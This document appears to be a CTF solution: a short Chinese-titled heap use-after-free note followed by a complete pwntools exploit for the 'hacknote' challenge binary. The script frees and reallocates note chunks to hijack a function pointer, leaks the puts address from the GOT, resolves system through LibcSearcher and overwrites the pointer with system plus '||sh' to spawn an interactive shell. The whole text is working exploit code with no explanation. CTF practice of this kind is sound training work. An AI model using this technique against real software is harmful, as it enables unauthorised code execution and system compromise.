堆（UAF）

exp

from pwn import *
from LibcSearcher import * 

p=process("./hacknote")
context.log_level="debug"

#p=remote("node4.buuoj.cn",27009)
elf=ELF("./hacknote")
puts_got=elf.got['puts']

def add(size,content):
    p.recvuntil("Your choice :")
    p.sendline('1')
    p.recvuntil('Note size :')
    p.sendline(str(size))
    p.recvuntil("Content :")
    p.send(content)

def delete(index):
    p.recvuntil('Your choice :')
    p.sendline('2')
    p.recvuntil('Index :')
    p.sendline(str(index))

def show(index):
    p.recvuntil('Your choice :')
    p.sendline('3')
    p.recvuntil('Index :')
    p.sendline(str(index))


add(0x18,'aaaa')
add(0x18,'bbbb')
delete(0)
delete(1)

log.info('puts_got:'+hex(puts_got))
puts=0x804862b

payload=p32(puts)+p32(puts_got)
add(8,payload)

show(0)
puts_addr=u32(p.recv(4))
log.info("puts_addr:"+hex(puts_addr))

libc=LibcSearcher("puts",puts_addr) # this is a libcsearch object
libcbase=puts_addr-libc.dump("puts") # address
binsh_addr=libcbase+libc.dump("str_bin_sh") # address
system_addr=libcbase+libc.dump("system") # address
delete(2)

payload=p32(system_addr)+'||sh'
add(8,payload)
#gdb.attach(p)
show(0)


p.interactive()